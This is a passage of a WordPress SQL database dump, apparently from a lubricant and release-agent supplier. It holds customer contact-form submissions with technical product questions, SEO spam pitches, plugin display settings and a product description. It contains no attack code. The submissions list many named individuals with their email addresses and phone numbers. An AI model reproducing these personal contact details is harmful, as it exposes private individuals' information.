INSERT INTO `wp_postmeta` VALUES (31095, 3471, '_field_3', 'Hi,\r\n\r\nIn working with thousands of online marketers, one of the key issues they struggle with is knowing whether their Search program is being handled properly.\r\n\r\nNow you no longer have to guess, you can run a FREE SEO grader report as often as you wish to see how well SEO is performing. \r\n\r\nPlease feel free to run an audit at myseoaudit.report , it only takes 45 seconds, if you like the report please tell your friends.\r\n\r\nIf after you run the report, you feel that you would like some help with your SEO please call or email me. I feel pretty confident that I can give you some advice that might help.\r\n\r\n\r\nAll the best,\r\n\r\nJamie Wilson\r\nDigital Marketing Manager\r\nSmarter Tactics\r\n(877) 228-1545'); 
INSERT INTO `wp_postmeta` VALUES (31096, 3471, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31097, 3471, '_sub_id', '3471'); 
INSERT INTO `wp_postmeta` VALUES (31098, 3472, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31099, 3472, '_seq_num', '199'); 
INSERT INTO `wp_postmeta` VALUES (31100, 3472, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31101, 3472, '_field_12', 'Juan Martinez'); 
INSERT INTO `wp_postmeta` VALUES (31102, 3472, '_field_13', 'WET Design'); 
INSERT INTO `wp_postmeta` VALUES (31103, 3472, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31104, 3472, '_field_14', 'juan.martinez@wetdesign.com'); 
INSERT INTO `wp_postmeta` VALUES (31105, 3472, '_field_15', '(310) 384-5850'); 
INSERT INTO `wp_postmeta` VALUES (31106, 3472, '_field_16', 'What is the recommended Dip time for a reliable silicone conformal coating using MS-462H product?'); 
INSERT INTO `wp_postmeta` VALUES (31107, 3472, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31108, 3472, '_sub_id', '3472'); 
INSERT INTO `wp_postmeta` VALUES (31109, 3472, '_edit_lock', '1484667015:2'); 
INSERT INTO `wp_postmeta` VALUES (31110, 3473, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31111, 3473, '_seq_num', '248'); 
INSERT INTO `wp_postmeta` VALUES (31112, 3473, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31113, 3473, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31114, 3473, '_field_1', 'Donald Taber'); 
INSERT INTO `wp_postmeta` VALUES (31115, 3473, '_field_10', 'deVan Sealants'); 
INSERT INTO `wp_postmeta` VALUES (31116, 3473, '_field_2', 'dctaber@devansealants.com'); 
INSERT INTO `wp_postmeta` VALUES (31117, 3473, '_field_8', '(314) 383-1941'); 
INSERT INTO `wp_postmeta` VALUES (31118, 3473, '_field_3', 'We need to replace our current anti-tack coating (supplier issues and need to eliminate zinc).  It is a low solids (&lt;20%) water borne coating, main ingredients are Zinc Stearate and mica.  it is dip tank applied to an extruded butyl rubber sealant.  The sealant is extruded into a 3/4&quot; diameter rope, wound on a spool, and must be easily unwound.  Processing temperatures do not exceed 160F.   Would a fine PTFE powder be useful for this? Can it be dispersed in water?  Would like recommendation and samples. '); 
INSERT INTO `wp_postmeta` VALUES (31119, 3473, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31120, 3473, '_sub_id', '3473'); 
INSERT INTO `wp_postmeta` VALUES (31121, 3474, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31122, 3474, '_seq_num', '249'); 
INSERT INTO `wp_postmeta` VALUES (31123, 3474, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31124, 3474, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31125, 3474, '_field_1', 'James Anderson'); 
INSERT INTO `wp_postmeta` VALUES (31126, 3474, '_field_10', 'SiteHawk'); 
INSERT INTO `wp_postmeta` VALUES (31127, 3474, '_field_2', 'hawk3@sitehawk.com'); 
INSERT INTO `wp_postmeta` VALUES (31128, 3474, '_field_8', '(615) 459-0064'); 
INSERT INTO `wp_postmeta` VALUES (31129, 3474, '_field_3', 'Subject: Request for Material Safety Data Sheet - Lonza Biologics Portsmouth\r\n\r\nHello,\r\n\r\nLonza Biologics Portsmouth  has contracted SiteHawk to help manage their MSDS database for materials that are used at their facility.As part of this service, SiteHawk is contacting their suppliers for updated MSDS documents. We have tried to retrieve the MSDS for the below mentioned products from your website. However, we could not locate the same. Could you please send us the latest MSDS for the following products in English language ?\r\n\r\nWe have an older version of the MSDS for this product (Revision Date listed below along with the product name).If you have a newer version of MSDS, could you please send them to us? \r\n\r\nThe products are:\r\n\r\n1) Product_Name: MS-990/CO2 Safezone Solvent Flux Remover\r\n   ProductCodes: Not Available\r\n   Country of Mfr: United States\r\n   Revision Date of MSDS available with us: 11/01/2009\r\n   Language: English (United States)\r\n\r\n2) Product_Name: MS-240 Quik-Freeze\r\n   ProductCodes: Not Available\r\n   Country of Mfr: United States\r\n   Revision Date of MSDS available with us: 01/01/1992\r\n   Language: English (United States)\r\n\r\n3) Product_Name: MS-190HD/CO2 Heavy Duty Flux Remover\r\n   ProductCodes: MS-190HD/CO2\r\n   Country of Mfr: United States\r\n   Revision Date of MSDS available with us: 04/01/2008\r\n   Language: English\r\n\r\nNOTE:\r\nIf you cannot locate the MSDS for these products, please respond and state so in the email so that I can convey this to our client.\r\n\r\nIf the MSDS are not required for the above products, please send us an Exempt Letter (i.e., a letter stating that the product is not hazardous and so does not require an MSDS) stating the name of the product for which the MSDS is not required.\r\n\r\nThe MSDS can be emailed to hawk3@sitehawk.com or faxed to 1-888-871-5654.\r\n\r\nMail Hardcopies to:  SDS Request, 709 Nissan Drive, Smyrna TN 37127.\r\n\r\nPlease feel free to contact me if you have questions or require additional information.\r\n\r\nThank you,\r\nJames Anderson\r\n\r\nSiteHawk\r\n709 Nissan Drive\r\nSmyrna TN 37127\r\nExtension: (615) 459-0064 Ext -706\r\nFax: 1-888-871-8163\r\nEmail: hawk3@sitehawk.com'); 
INSERT INTO `wp_postmeta` VALUES (31130, 3474, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31131, 3474, '_sub_id', '3474'); 
INSERT INTO `wp_postmeta` VALUES (31132, 3475, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31133, 3475, '_seq_num', '200'); 
INSERT INTO `wp_postmeta` VALUES (31134, 3475, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31135, 3475, '_field_12', 'Brent Ravnaas'); 
INSERT INTO `wp_postmeta` VALUES (31136, 3475, '_field_13', 'Horseshoe Valley Composites LLC.'); 
INSERT INTO `wp_postmeta` VALUES (31137, 3475, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31138, 3475, '_field_14', 'brent@horseshoevalleycomposites.com'); 
INSERT INTO `wp_postmeta` VALUES (31139, 3475, '_field_15', '(701) 448-9145'); 
INSERT INTO `wp_postmeta` VALUES (31140, 3475, '_field_16', 'I am currently using a wax based release agent on aluminum molds for a rigid urethane foam product.  I would like to replace the wax based product as post clean up to allow for post mold bonding is too time consuming.  Can you please recommend a product of yours for me to try along with a distributor to purchase from?  My business is located in ND.'); 
INSERT INTO `wp_postmeta` VALUES (31141, 3475, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31142, 3475, '_sub_id', '3475'); 
INSERT INTO `wp_postmeta` VALUES (31143, 3476, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31144, 3476, '_seq_num', '250'); 
INSERT INTO `wp_postmeta` VALUES (31145, 3476, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31146, 3476, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31147, 3476, '_field_1', 'Eduardo Gerhardt'); 
INSERT INTO `wp_postmeta` VALUES (31148, 3476, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31149, 3476, '_field_2', 'eduardo.gerhardt@senairs.org.br'); 
INSERT INTO `wp_postmeta` VALUES (31150, 3476, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31151, 3476, '_field_3', 'Hello, i want to know what is the indicated dry demolding for rigid polyurethane foam fabricated by reactive injection molding (RIM) process. The final part surface must be low gloss and free of residuals.'); 
INSERT INTO `wp_postmeta` VALUES (31152, 3476, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31153, 3476, '_sub_id', '3476'); 
INSERT INTO `wp_postmeta` VALUES (31154, 3477, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31155, 3477, '_seq_num', '251'); 
INSERT INTO `wp_postmeta` VALUES (31156, 3477, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31157, 3477, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31158, 3477, '_field_1', 'Michael Kujawa'); 
INSERT INTO `wp_postmeta` VALUES (31159, 3477, '_field_10', 'Anaren Microwave'); 
INSERT INTO `wp_postmeta` VALUES (31160, 3477, '_field_2', 'michael.kujawa@anaren.com'); 
INSERT INTO `wp_postmeta` VALUES (31161, 3477, '_field_8', '(315) 640-9537'); 
INSERT INTO `wp_postmeta` VALUES (31162, 3477, '_field_3', 'We are bonding two ceramic materials together to form a electro-magnetic device using in microwave electronics.  One part is an electro-magnet (samarium cobalt), and the other part is a iron-impregnated ceramic (ferrite) substrate.  The bond line must be thin (.001-.003&quot;) and must survive solder reflow temperatures (up to 450deg F) (application #1) or up to 180degF operating temp (no solder reflow; application #2).  Can you recommend suitable epoxies for this application?'); 
INSERT INTO `wp_postmeta` VALUES (31163, 3477, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31164, 3477, '_sub_id', '3477'); 
INSERT INTO `wp_postmeta` VALUES (31165, 3479, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31166, 3479, '_seq_num', '201'); 
INSERT INTO `wp_postmeta` VALUES (31167, 3479, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31168, 3479, '_field_12', 'Ryan Thompson'); 
INSERT INTO `wp_postmeta` VALUES (31169, 3479, '_field_13', 'University of Kansas'); 
INSERT INTO `wp_postmeta` VALUES (31170, 3479, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31171, 3479, '_field_14', 'ryan.thompson@ku.edu'); 
INSERT INTO `wp_postmeta` VALUES (31172, 3479, '_field_15', '(785) 864-2856'); 
INSERT INTO `wp_postmeta` VALUES (31173, 3479, '_field_16', 'Good day! I am a Hazardous Waste technician for the University of Kansas and we came across one of your products, MS-143DF TFE Release Agent - Dry Lubricant. Do you have an SDS for this product so we can dispose of it properly?\r\nThank you for your time!'); 
INSERT INTO `wp_postmeta` VALUES (31174, 3479, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31175, 3479, '_sub_id', '3479'); 
INSERT INTO `wp_postmeta` VALUES (31176, 3480, '_edit_lock', '1484683840:2'); 
INSERT INTO `wp_postmeta` VALUES (31177, 3480, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (31178, 3480, 'dp_sort-element', 'displayProduct-button,displayProduct-image,displayProduct-price,displayProduct-title'); 
INSERT INTO `wp_postmeta` VALUES (31179, 3480, 'dp_select_template', 'boxCarousel'); 
INSERT INTO `wp_postmeta` VALUES (31180, 3480, 'dp_title', 's:280:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (31181, 3480, 'dp_image', 's:204:"a:8:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:12:"hover_effect";s:7:"disable";s:5:"width";s:3:"400";s:6:"height";s:3:"400";s:4:"crop";s:1:"0";}";'); 
INSERT INTO `wp_postmeta` VALUES (31182, 3480, 'dp_excerpt', 's:300:"a:11:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:6:"lenght";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (31183, 3480, 'dp_content', 's:267:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:6:"lenght";s:0:"";s:4:"type";s:4:"none";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (31184, 3480, 'dp_price', 's:288:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:11:"custom-link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (31185, 3480, 'dp_saleprice', 's:2:"N;";'); 
INSERT INTO `wp_postmeta` VALUES (31186, 3480, 'dp_sku', 's:280:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (31187, 3480, 'dp_stock', 's:280:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (31188, 3480, 'dp_category', 's:280:"a:10:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:4:"link";s:10:"custom_url";s:0:"";s:9:"font-size";s:2:"14";s:11:"font-family";s:5:"arial";s:6:"weight";s:6:"normal";s:5:"color";s:7:"#444444";s:12:"hover-weight";s:6:"normal";s:10:"HoverColor";s:7:"#A88F5C";}";'); 
INSERT INTO `wp_postmeta` VALUES (31189, 3480, 'dp_addtocartbutton', 's:193:"a:7:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:4:"type";s:7:"default";s:10:"custom_url";s:0:"";s:11:"custom_text";s:0:"";s:5:"color";s:7:"#fc5b5b";s:10:"hovercolor";s:7:"#444444";}";'); 
INSERT INTO `wp_postmeta` VALUES (31190, 3480, 'dp_customfield', 's:103:"a:4:{s:11:"column_name";s:0:"";s:12:"column_width";s:0:"";s:8:"meta_key";s:0:"";s:4:"type";s:4:"text";}";'); 
INSERT INTO `wp_postmeta` VALUES (31191, 3480, 'dp_variable', 's:2:"N;";'); 
INSERT INTO `wp_postmeta` VALUES (31192, 3480, 'dp_option', 's:595:"a:15:{s:16:"filter_condition";s:13:"filterproduct";s:18:"category_condition";s:14:"customCategory";s:15:"category_select";a:3:{i:0;s:29:"semi-permanent-release-agents";i:1;s:19:"ptfe-release-agents";i:2;s:24:"high-temp-release-agents";}s:13:"tag_condition";s:6:"allTag";s:23:"shippingClass_condition";s:16:"allShippingClass";s:12:"stock_select";s:3:"all";s:10:"date_range";s:3:"all";s:10:"start_date";s:0:"";s:8:"end_date";s:0:"";s:4:"sort";s:7:"default";s:7:"perpage";s:2:"20";s:6:"column";s:1:"3";s:11:"frontsorter";s:7:"disable";s:10:"pagination";s:7:"default";s:9:"quickview";s:7:"default";}";'); 
INSERT INTO `wp_postmeta` VALUES (31193, 3480, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (31194, 468, '_wp_old_slug', 'millube-perfluorinated-synthetic-lubricants'); 
INSERT INTO `wp_postmeta` VALUES (31195, 468, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (31196, 468, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (31197, 468, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (31198, 468, '_yoast_wpseo_focuskw_text_input', 'Biocompatible Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (31199, 468, '_yoast_wpseo_focuskw', 'Biocompatible Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (31200, 468, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (31201, 468, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (31202, 468, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (31203, 468, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (31204, 468, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (31205, 468, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (31206, 468, '_ywtm_content_tab_description', '<h3><strong><span style="font-size: 14.4px;">TriboSys™ Fluorinated Synthetic Biocompatible Lubricants</span></strong></h3>\r\n<span style="font-size: 14.4px;">TriboSys™ PFPE (perfluoropolyether) biocompatible lubricants, oils and greases provide superior quality lubrication under the most challenging medical application in comparison to hydrocarbon and silicone alternatives. TriboSys™ was designed to decrease wear and extend service intervals on all medical devices. Medical device engineers will value the dramatic decrease in mechanical wear, unwanted noise, and broad temperature range our lubricants impart.  All variants of TriboSys are unaffected by all forms of sterilization and will not transfer or degrade under these conditions. Benefits include:</span>\r\n<ul>\r\n 	<li class="Body">Superior Lubrication over conventional alternatives</li>\r\n 	<li class="Body">Biocompatible (<a href="http://www.fda.gov/downloads/medicaldevices/deviceregulationandguidance/guidancedocuments/ucm348890.pdf">ISO 10993</a>)</li>\r\n 	<li class="Body">Chemically Inert; Non-<wbr />nutrient</li>\r\n 	<li class="Body">Non-<wbr />Flammable; Oxygen-<wbr />safe</li>\r\n 	<li class="Body">Odorless and Non-<wbr />Staining</li>\r\n</ul>\r\nThese biocompatible lubricants were specially designed to serve the medical industry. Meeting ISO 10993 biocompatibility standards these lubricants are ideal for medical devices. Devices such as <span class="C-12">Single and Multi-<wbr />Use Surgical Device Housings and Compressed Medical Gasses. </span>\r\n<h4 class="Body"><span class="C-12"><strong>Single and Multi-<wbr />Use Surgical Device Housings</strong>:</span></h4>\r\n<p class="Body"><span class="C-8">TriboSys™ is a high-<wbr />performance fluorinated lubricant that exhibits exceptional stability and will minimize mechanical wear </span><span class="C-8">allowing critical surgical devices to perform reliably and as designed. These biocompatible oils and greases are non-<wbr />nutrient ensuring microbial.</span></p>\r\n\r\n<h4 class="Body"><strong>Compressed Medical Gases:</strong></h4>\r\n<p class="Body">TriboSys™ grease is chemically inert and oxygen stable. This makes TriboSys™ the lubricant of choice for medical gas cylinders, anesthesia machines, and oxygen valves.</p>'); 
INSERT INTO `wp_postmeta` VALUES (31207, 468, '_yoast_wpseo_linkdex', '95'); 
INSERT INTO `wp_postmeta` VALUES (31208, 3483, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31209, 3483, '_seq_num', '252'); 
INSERT INTO `wp_postmeta` VALUES (31210, 3483, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31211, 3483, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31212, 3483, '_field_1', 'Fabiana Fantinel'); 
INSERT INTO `wp_postmeta` VALUES (31213, 3483, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31214, 3483, '_field_2', 'fabiana.fantinel@10EQS.net'); 
INSERT INTO `wp_postmeta` VALUES (31215, 3483, '_field_8', '(491) 744-6577'); 
INSERT INTO `wp_postmeta` VALUES (31216, 3483, '_field_3', 'Hello,\r\n\r\nFor my client GENERAL ELECTRICS USA, I am looking for an epoxy mould release agent to replace QZ 13 mould from Huntsmann, based on  Silicic acid, sodium\r\nsalt, reaction products\r\nwith\r\nchlorotrimethylsilane\r\nand iso-Pr alc. diluted in organic solvents.\r\n\r\nThank you and best regards\r\nDr. Fabiana Fantinel'); 
INSERT INTO `wp_postmeta` VALUES (31217, 3483, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31218, 3483, '_sub_id', '3483'); 
INSERT INTO `wp_postmeta` VALUES (31219, 3484, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31220, 3484, '_seq_num', '253'); 
INSERT INTO `wp_postmeta` VALUES (31221, 3484, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31222, 3484, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31223, 3484, '_field_1', 'Randy Bonino'); 
INSERT INTO `wp_postmeta` VALUES (31224, 3484, '_field_10', 'RBC Transport Dynamics'); 
INSERT INTO `wp_postmeta` VALUES (31225, 3484, '_field_2', 'rbonino@rbcbearings.com'); 
INSERT INTO `wp_postmeta` VALUES (31226, 3484, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31227, 3484, '_field_3', 'Currently use &quot;Dupont Dry Film RA/W&quot; (item #D15046633) and looking for aerosol can replacements. Last batch was purchased in 2013.'); 
INSERT INTO `wp_postmeta` VALUES (31228, 3484, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31229, 3484, '_sub_id', '3484'); 
INSERT INTO `wp_postmeta` VALUES (31230, 3485, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31231, 3485, '_seq_num', '254'); 
INSERT INTO `wp_postmeta` VALUES (31232, 3485, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31233, 3485, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31234, 3485, '_field_1', 'Alisha Wilson'); 
INSERT INTO `wp_postmeta` VALUES (31235, 3485, '_field_10', 'weboptimizes'); 
INSERT INTO `wp_postmeta` VALUES (31236, 3485, '_field_2', 'alisha.wilson@weboptimizes.com'); 
INSERT INTO `wp_postmeta` VALUES (31237, 3485, '_field_8', '804-397-1662'); 
INSERT INTO `wp_postmeta` VALUES (31238, 3485, '_field_3', 'Hello Team,  Get your website on Google’s Front Page search:  We would like to have a discussion with you regarding the web promotion strategy for your website. We wish to work out a proposal to strengthen the online presence of your website, via, a strategically planned web promotion campaign. In today’s online era, you should be focusing on the new revolutionary ways of generating traffic.  We were curious to know if you were aware that are a few issues bugging your website. Sorting out these will help you get the best returns out of your website.  Your website seems to be attracting traffic, but this traffic is almost stagnant and limited, which affects potential sales as you move forward.  Your website doesn&#039;t feature in Google&#039;s first search page for some of the major keywords in your niche, which affects visibility.  Your website has been diagnosed with coding issues, which affects ranking.  Your back links profile is not efficient enough to help your search engine visibility.  Your website is currently not being properly promoted online, which is affecting your marketing strategy and goals  Your presence in social media platform (Facebook, Twitter, etc.) is minimal. This is depriving you of a huge market of prospective referral clients.   We excel in running promotional online marketing campaign for websites. We have a host of ethical services and techniques, which you can utilize to improve your website&#039;s performance. We could send you more details regarding your present website status; we would be glad to share “PRE SEO REPORT” or “WEBSITE ANALYSIS REPORT for FREE”.  Kindly revert back if you are interested, then we can send you more detail about package which will improve your sales &amp; website ranking too.  Hope to get early response.  Best Regards,  Alisha Wilson | Senior Sales Advisor  _________________________________________________________________________  PS1: Please answer to our email with “Interested” or “Not Interested” so that we will know the status of your inquiry and act accordingly. If you are interested then I will send more details on our “corporate identity”, “company profile”, “why you should choose us?”, “Price list”, “money back guarantee”.   PS2: I found your site using Google search and after having a look over your website I recommend you to implement future technologies such as HTML5 and Responsive Design to make your site more accessible in mobile phone, tablets, desktop etc.'); 
INSERT INTO `wp_postmeta` VALUES (31239, 3485, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31240, 3485, '_sub_id', '3485'); 
INSERT INTO `wp_postmeta` VALUES (31241, 3488, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31242, 3488, '_seq_num', '255'); 
INSERT INTO `wp_postmeta` VALUES (31243, 3488, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31244, 3488, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31245, 3488, '_field_1', 'Stefanos Athanasopoulos'); 
INSERT INTO `wp_postmeta` VALUES (31246, 3488, '_field_10', 'Lund University - Sweden'); 
INSERT INTO `wp_postmeta` VALUES (31247, 3488, '_field_2', 'stefanos.athanasopoulos@solid.lth.se'); 
INSERT INTO `wp_postmeta` VALUES (31248, 3488, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31249, 3488, '_field_3', 'Dear Sir or Madam,\r\n\r\nMy name is Stefanos Athanasopoulos. I am a PhD student at Lund University, Sweden.\r\n\r\nFor the purposes of my project I am building a prototype experimental device for rock deformation. In order to reduce the friction between the rock samples and the metallic parts of such apparatuses, it is very common to use some sort of lubricant (of the most common methods are 1. to use very thin teflon sheets and 2. to use a mixture of stearic acid with vaseline). \r\n\r\nThe prototype that I am building has some particularities though. More specifically, it will be used for neutron experiments, thus the lubricant I will use has to be Hydrogen free, so that it will not affect the path of the neutrons to the sample. Apart from that, the apparatus I am building will have windows so that photos can be taken while realising the experiments. This means that the lubricant I will use has to be transparent. \r\n\r\nIdeally I am hoping that I will be able to find some sort of a spray fluorinated lubricant. Do you think that your company has products that match the specifications I mentioned?\r\n\r\nThank you very much in advance. \r\n\r\nLooking forward to hearing from you.\r\n\r\nBest regards,\r\nStefanos Athanasopoulous'); 
INSERT INTO `wp_postmeta` VALUES (31250, 3488, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31251, 3488, '_sub_id', '3488'); 
INSERT INTO `wp_postmeta` VALUES (31252, 3489, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31253, 3489, '_seq_num', '256'); 
INSERT INTO `wp_postmeta` VALUES (31254, 3489, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31255, 3489, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31256, 3489, '_field_1', 'Brandon Fritz'); 
INSERT INTO `wp_postmeta` VALUES (31257, 3489, '_field_10', 'Everson Tesla'); 
INSERT INTO `wp_postmeta` VALUES (31258, 3489, '_field_2', 'bfritz@eversontesla.com'); 
INSERT INTO `wp_postmeta` VALUES (31259, 3489, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31260, 3489, '_field_3', 'What&#039;s the maximum temperature that EPON Resin 815C can be exposed to?\n\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (31261, 3489, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31262, 3489, '_sub_id', '3489'); 
INSERT INTO `wp_postmeta` VALUES (31263, 3490, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31264, 3490, '_seq_num', '257'); 
INSERT INTO `wp_postmeta` VALUES (31265, 3490, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31266, 3490, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31267, 3490, '_field_1', 'Mike Wright'); 
INSERT INTO `wp_postmeta` VALUES (31268, 3490, '_field_10', 'Adient, RECARO Specialty Seating Group'); 
INSERT INTO `wp_postmeta` VALUES (31269, 3490, '_field_2', 'mike.wright@recaro-automotive.com'); 
INSERT INTO `wp_postmeta` VALUES (31270, 3490, '_field_8', '(248) 484-3264'); 
INSERT INTO `wp_postmeta` VALUES (31271, 3490, '_field_3', 'Sales,\r\nPlease send a sample of AUT 2045. I will be evaluating this lube as a squeak/noise countermeasure between ABS plastic and steel in a seat. Please confirm AUT 2045 is appropriate for this application.\r\nThx,\r\nMike Wright\r\nProduct Design Engineer  \r\nRECARO Automotive\r\n4120 Luella Lane\r\nAuburn Hills, MI 48326'); 
INSERT INTO `wp_postmeta` VALUES (31272, 3490, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31273, 3490, '_sub_id', '3490'); 
INSERT INTO `wp_postmeta` VALUES (31274, 3491, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31275, 3491, '_seq_num', '258'); 
INSERT INTO `wp_postmeta` VALUES (31276, 3491, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31277, 3491, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31278, 3491, '_field_1', 'Scott Rudolph'); 
INSERT INTO `wp_postmeta` VALUES (31279, 3491, '_field_10', 'Naval Research Lab'); 
